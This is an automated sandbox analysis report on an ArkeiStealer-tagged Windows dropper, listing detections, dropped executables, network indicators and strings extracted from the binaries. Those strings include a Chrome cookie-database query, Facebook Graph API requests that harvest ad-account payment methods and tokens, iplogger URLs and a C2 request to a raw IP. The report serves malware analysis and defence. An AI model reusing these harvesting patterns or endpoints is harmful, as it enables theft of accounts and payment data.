Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report KeJ7Cl7flZ.exe

Overview

General Information

Sample Name:KeJ7Cl7flZ.exe
Analysis ID:324174
MD5:4e759849412063c6590936671ce4aa0e
SHA1:40d132516cc4b9aa00dca2b2f068c439cf8f59c3
SHA256:7a79f0c95e891b939e275fa19e641b676f2eb70471945fb3b15d6a649cafe071
Tags:ArkeiStealerexe

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • KeJ7Cl7flZ.exe (PID: 4576 cmdline: 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe' MD5: 4E759849412063C6590936671CE4AA0E)
    • 002.exe (PID: 3568 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe' MD5: 6503C9C4F19A4B33B701CC5B97B349BC)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • Setup.exe (PID: 6668 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe' MD5: 62EAEA103DD9BEB69E884F2EDE1ACD63)
      • setup.exe (PID: 6732 cmdline: 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s MD5: D64E3CC11AFC6331715BDFEC5F26C2A0)
        • aliens.exe (PID: 1112 cmdline: 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe' MD5: 0F88FD9D557FFBE67A8897FB0FC08EE7)
    • jg2_2qua.exe (PID: 5292 cmdline: 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe' MD5: 676757904C8383FD9ACBEED15AA8DCC4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
19.2.aliens.exe.3310000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
19.2.aliens.exe.3310000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeAvira: detection malicious, Label: HEUR/AGEN.1139239
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeAvira: detection malicious, Label: TR/Siggen.lhhpy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeAvira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeAvira: detection malicious, Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeAvira: detection malicious, Label: HEUR/AGEN.1134829
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeAvira: detection malicious, Label: TR/AD.PredatorThief.gldkk
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeAvira: detection malicious, Label: TR/AD.JamkeeDldr.gwmgy
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeAvira: detection malicious, Label: TR/AD.ColtyStealer.mwfxd
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeAvira: detection malicious, Label: HEUR/AGEN.1138531
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeAvira: detection malicious, Label: TR/Kryptik.ijozo
Multi AV Scanner detection for domain / URLShow sources
Source: jojo-soft.xyzVirustotal: Detection: 8%Perma Link
Source: evograph.roVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: KeJ7Cl7flZ.exeVirustotal: Detection: 67%Perma Link
Source: KeJ7Cl7flZ.exeReversingLabs: Detection: 79%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeJoe Sandbox ML: detected
Source: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: KeJ7Cl7flZ.exeJoe Sandbox ML: detected
Source: 19.2.aliens.exe.2f00000.4.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 26.0.jg2_2qua.exe.400000.0.unpackAvira: Label: TR/Crypt.CFI.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10003535 CryptUnprotectData,_malloc,_memset,_memmove,__snprintf_s,_free,LocalFree,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDFB78 FindFirstFileExA,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007A928 FindFirstFileExA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045DD7C FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Desktop\desktop.ini

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: ip-api.com
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: unknownTCP traffic detected without corresponding DNS query: 101.36.107.74
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1000AA5D _memset,_memset,_memset,_memset,_memset,InternetCrackUrlA,__time64,_rand,InternetOpenA,_wprintf,InternetConnectA,_wprintf,InternetCloseHandle,HttpOpenRequestA,_wprintf,InternetCloseHandle,InternetCloseHandle,HttpAddRequestHeadersA,InternetSetOptionA,LdrInitializeThunk,LdrInitializeThunk,HttpSendRequestA,GetLastError,HttpQueryInfoA,_wprintf,_wprintf,InternetReadFile,_memset,GetLastError,_wprintf,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,LdrInitializeThunk,LdrInitializeThunk,
Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
Source: askinstall21.exeString found in binary or memory: %02X%02X%02X%02X%02X%02Xcmd.exe /c taskkill /f /im chrome.exeDefault\js\background.js5.18.6_0\fnfhfpkmpnmlmlgfeabpegnfpdnmokcoconst mac = '';const channelid ='const version='SOFTWARE\Policies\Google\Chrome\ExtensionInstallWhitelist99extensions.settings.\u003C<extensionssettingsprotectionmacssuper_mac107\Temp\vnnsfgfgfghaz99\" /s /e /y" "xcopy " --window-position=-50000,-50000 --user-data-dir=" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/","message":"","code":"{"type":"installresult","uid":"successerr : write reg failed(RegCreateKeyExA)err : write reg failed(RegSetValueExA)err : extension dir not found(possible no chrome installed)err : zip release failederr : securepref not founderr : parse json failederr : unknown1","channelid":"","adminmode":""}","version":"JSON=application/x-www-form-urlencoded;charset=utf-8http://www.fddnice.pw//Home/Index/lkdinlhttp://12https://iplogger.org/1uVkt796https://iplogger.org/1TW3i797https://iplogger.org/1q6Jt7105https://iplogger.org/1O2BH106https://iplogger.org/1OZVHhttps://iplogger.org/1OXFG108https://iplogger.org/1lC5g109https://iplogger.org/1Ka7t7110https://iplogger.org/1OhAG111https://iplogger.org/16ajh7112https://iplogger.org/1XSq97113https://iplogger.org/19iM77114https://iplogger.org/16xjh7115https://iplogger.org/1XJq97116https://iplogger.org/1XKq97117https://iplogger.org/1X8M97118https://iplogger.org/1UpU57119https://iplogger.org/1T79i7120https://iplogger.org/1T89i7121https://iplogger.org/1Uts87122https://iplogger.org/1KyTy7123https://iplogger.org/1yXwr7124https://iplogger.org/1bV787125https://iplogger.org/1b4887\/ equals www.facebook.com (Facebook)
Source: askinstall21.exeString found in binary or memory: https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/ equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpString found in binary or memory: &ctarget=https%3A%2F%2Fwww.facebook.comcquick=jsc_c_e&cquick_token=/settings?find email</strong><strong>fbSettingsListItemContentEmail not found.0" title="href="https://www.facebook.com/profile_icondata-gt" role="<a aria-label=<a class=*/profile.php?sk=friend_gs6">,"Friends":"</span><span>,"status":","Page":"1<a href="https://business.facebook.com,"bm":"<>class="lastRow right","currency":","a":","b":"CHROME,"Channel":","Browser":"}]0102030405060708"username":"edge_followed_by":{"count":edge_follow":{"count":email":"username":"phone_number":"gender":first_name":"last_name":"{#},"br":"","yo":""pa":""us":""re":""ph":""se":""fs":,"fsr":"Channel":""xtype":2}]Failed to initialise Winsock, Error:%u equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: ....https://www.facebook.com/pages/?category=your_pages&ref=bookmarksuri_token"has_main_page":"https://business.facebook.com/select/?next=https%3A%2F%2Fbusiness.facebook.com%2F"has_BM":"https://www.facebook.com/ads/manager/account_settings/information/?act=%s&pid=p1&page=account_settings&tab=account_information"AdsCMConnectConfig",\[\],.?access_token:"(.+?)""AdsInterfacesSessionConfig",\[\],.?"sessionID":"(.+?)"https://graph.facebook.com/v7.0/act_%s?access_token=%s&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=%s&fields=%%5B%%22all_payment_methods%%7Bpayment_method_altpays%%7Baccount_id%%2Ccountry%%2Ccredential_id%%2Cdisplay_name%%2Cimage_url%%2Cinstrument_type%%2Cnetwork_id%%2Cpayment_provider%%2Ctitle%%7D%%2Cpm_credit_card%%7Baccount_id%%2Ccredential_id%%2Ccredit_card_address%%2Ccredit_card_type%%2Cdisplay_string%%2Cexp_month%%2Cexp_year%%2Cfirst_name%%2Cis_verified%%2Clast_name%%2Cmiddle_name%%2Ctime_created%%2Cneed_3ds_authorization%%2Csupports_recurring_in_india%%2Cverify_card_behavior%%7D%%2Cpayment_method_direct_debits%%7Baccount_id%%2Caddress%%2Ccan_verify%%2Ccredential_id%%2Cdisplay_string%%2Cfirst_name%%2Cis_awaiting%%2Cis_pending%%2Clast_name%%2Cmiddle_name%%2Cstatus%%2Ctime_created%%7D%%2Cpayment_method_extended_credits%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Cmax_balance%%2Ctype%%2Cpartitioned_from%%2Csequential_liability_amount%%7D%%2Cpayment_method_paypal%%7Baccount_id%%2Ccredential_id%%2Cemail_address%%2Ctime_created%%7D%%2Cpayment_method_stored_balances%%7Baccount_id%%2Cbalance%%2Ccredential_id%%2Ctotal_fundings%%7D%%2Cpayment_method_tokens%%7Baccount_id%%2Ccredential_id%%2Ccurrent_balance%%2Coriginal_balance%%2Ctime_created%%2Ctime_expire%%2Ctype%%7D%%7D%%22%%5D&include_headers=false&locale=en_US&method=get&pretty=0&suppress_http_code=1&xref=f33f78145820f4 }"pay":instagramds_user_id\\"\\"", "path":"/", "secure": false,"value": "{"domain":"www.instagram.com", "expirationDate":1590337688, "hostOnly": false, "httpOnly": true, "name": "instagram cookie:%s equals www.facebook.com (Facebook)
Source: 002.exeString found in binary or memory: Cookie: c_user={https://www.facebook.com/ads/manager/accounts/https://www.facebook.com/settings?tab=notificationsnoyes","isValid":"0https://www.facebook.com/profile.php"displayable_count":{"FantailLogQueue":null},"friends":"mail":"https://www.facebook.com/accountquality/%s/?source=mega_menu&nav_source=flyout_menu&nav_id=1765193856"adAccountID":""ad":"https://www.facebook.com/bookmarks/pages?ref_type=logout_gearid:"\d+",name:"(.+?)",count: equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpString found in binary or memory: Referer: https://www.facebook.com equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: T.exe_,"Friends":","status":","currency":","bm":","type":","a":","b":"p,"Channel":","Browser":"rltext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*;q=0.8,application/signed-exchange;v=b3username":"},edge_followed_by":{"count":edge_follow":{"count":email":"phone_number":"gender":first_name":","last_name":"{#}\"co":""br":""sy":""yo":""pa":""re":""ph":""se":""fs":"fsr":inauth_tokentwhttps://www.airbnb.cn/account-settingstext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3.airbnb.cnacha"compat_iframe_token":"https://www.facebook.com/settings?cquick=jsc_c_c&cquick_token=&ctarget=https%3A%2F%2Fwww.facebook.comhttps://www.facebook.com/settings&#064;</strong><strong>@b88801?act=</span><span>https://www.facebook.com/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settingsaccess_token:"adsApiVersion:"sessionID:"locale:"https://graph.facebook.com//act_?access_token=&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&fields=%5B%22all_payment_methods%7Bpayment_method_altpays%7Baccount_id%2Ccountry%2Ccredential_id%2Cdisplay_name%2Cimage_url%2Cinstrument_type%2Cnetwork_id%2Cpayment_provider%2Ctitle%7D%2Cpm_credit_card%7Baccount_id%2Ccredential_id%2Ccredit_card_address%2Ccredit_card_type%2Cdisplay_string%2Cexp_month%2Cexp_year%2Cfirst_name%2Cis_verified%2Clast_name%2Cmiddle_name%2Ctime_created%2Cneed_3ds_authorization%2Callow_manual_3ds_authorization%2Csupports_recurring_in_india%7D%2Cpayment_method_direct_debits%7Baccount_id%2Caddress%2Ccan_verify%2Ccredential_id%2Cdisplay_string%2Cfirst_name%2Cis_awaiting%2Cis_pending%2Clast_name%2Cmiddle_name%2Cstatus%2Ctime_created%7D%2Cpayment_method_extended_credits%7Baccount_id%2Cbalance%2Ccredential_id%2Cmax_balance%2Ctype%2Cpartitioned_from%2Csequential_liability_amount%7D%2Cpayment_method_paypal%7Baccount_id%2Ccredential_id%2Cemail_address%2Ctime_created%7D%2Cpayment_method_stored_balances%7Baccount_id%2Cbalance%2Ccredential_id%2Ctotal_fundings%7D%2Cpayment_method_tokens%7Baccount_id%2Ccredential_id%2Ccurrent_balance%2Coriginal_balance%2Ctime_created%2Ctime_expire%2Ctype%7D%7D%22%5D&include_headers=false&locale=&method=get&pretty=0&suppress_http_code=1pm_credit_card"country":mastervisaamericanpaypalbalance</td>||-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36ike.airbnb.cn11fiachitichiffiedtch9C71F883-5E43-41AA-85D0-5272784FB258,"Creditcard":"timeline_chrome.php?sk=friendshttp://103.91.21Facebook</title>facebook</title>book.com/pages/?category=your_paall_accounts_tabhttp://qazwsxedcnavigate_from_adSoftware\\TestRele_account_id_cehttps://www.facebook.com/profilebook.com/settinggister\\TestRegiges&ref=bookmarkbook.com/ads/managram.com/accouncompat_iframe_toks/pages?ref_typbook.com/bookmarhttps://www.instadmined_pages":{ equals www.facebook.com (Facebook)
Source: ubisoftpro.exeString found in binary or memory: \MicrosoftEdgeCP\\Application\\c\\Google\\Chrome\\User Data\\Def\\Mozilla\\Firefwww.facebook.comwww.instagram.co\\Mozilla Firefo equals www.facebook.com (Facebook)
Source: jg2_2qua.exe, 0000001A.00000003.481728424.000000000075E000.00000004.00000001.sdmpString found in binary or memory: ct name,value,encrypted_value from cookies where instr("www.facebook.com", host_key)>0 equals www.facebook.com (Facebook)
Source: hjjgaa.exeString found in binary or memory: d@invalid stoi argumentstoi argument out of rangeUseJu47egg whatppphatOjk4ehg riwjgHgegUse whatppphatYk43h7gr riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?MalformedHh6e4sgg urlStrXhegkh4gErrorJhg4eu (WinHttpOpenNm4eg)ErrorOj7g4he (WinHttpGetProxyForUrlTh7e4gh)Error (WinHttpGetProxyForUrl)httphttpsUnknownNsV6e4hg schemeBe7n4us ErrorBjhe4hg (WinHttpConnectLj6e3hgg)?ErrorS7je4hg (WinHttpOpenRequestP6je4hg)ErrorHf74ge7g (WinHttpSendRequestVe7j4gi)ErrorJh7b4egg (WinHttpSendRequestPke4jhg)ErrorKj7e4hg (WinHttpReceiveResponseCeheg34g)ErrorTjr57eh (WinHttpQueryDataAvailableAe7hj4g)ErrorUj7e4hg (WinHttpReadDataPjke4hg)ErrorGh7e4hg (WinHttpSetCredentialsHe7j4hg)ErrorPj7e4hg (WinHttpQueryHeadersYg8e5gg)ErrorJh7eg4g (WinHttpQueryAuthSchemesYe6hg4)POSTGETlogin/device-based/loginContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9viewport-width: 1920Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Origin: https://www.facebook.comSec-Fetch-Dest: documentUpgrade-Insecure-Requests: 1/adsmanager/creation?act=/ads/manager/account_settings/account_billingSec-Fetch-Site: noneAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v7.0/act_Accept: */*Content-type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitemanager/account_settings/account_billingprimary_location/infoprofile.phppages/?category=your_pageshttps://www.facebook.com/Error (WinHttpSetOption)Error 